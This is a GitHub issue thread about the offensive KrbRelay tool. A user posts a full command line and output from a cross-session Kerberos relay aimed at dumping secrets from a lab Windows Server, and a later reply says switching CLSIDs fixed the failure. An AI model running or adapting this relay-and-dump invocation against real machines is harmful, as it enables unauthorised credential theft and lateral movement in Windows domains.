cube0x0 / KrbRelay

Framework for Kerberos relaying

Could not open service handle, wrong name?

job-6 opened this issue

commented

I am trying to dump passwords on a remote machine with option -secret but receiving a "Could not open service handle, wrong name?" on Windows Server 2016 1607 (source and destination). Any idea? ;-)

The SMB session obtained is unprivileged and seems to come from the user that is running the command instead of the targeted one in session 4.

```
.\KrbRelay.exe -spn cifs/srv01.lab.local -session 4 -clsid 0289a7c5-91bf-4547-81ae-fec91a89dec5 -secrets
[*] Relaying context: lab\da01
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAB5xV/ci7Pv5WVPMzxQBfngAkwAAJAD//+n36aR6q52FyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 0289a7c5-91bf-4547-81ae-fec91a89dec5
[*] Spawning in session 4
[*] apReq:
[*] apRep1: 6f8188308185a003020105a10302010fa2793077a003020112a270046e968a45b9c6b880b9f734e7301d1d12279765fa3379fe3fd9e5501209e88f9da347ec78a24421eda252cc0ed73f7eccbb27fd7eceb8c2b7767b0227695644a785d00e96bf3def2644944f5582fe14f54f432cfaca5da67d6812c4cc8d8caf08b8c2160e874ddb79b511c3bdef9030
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: 6f5a3058a003020105a10302010fa24c304aa003020112a2430441d51192b4623888be0e012bfcacf1345d6a6cab5979683329622f13114500bd793a4239813e9753835b45b1e505832416282cfa8a7eb89e96d21a2f93fef7a9f03f
[+] SMB session established
[-] Could not open service handle, wrong name?
[-] Could not start remoteregistry
```

commented

Okay, it seems that the chosen CLSID was the problem. I used another one and it worked.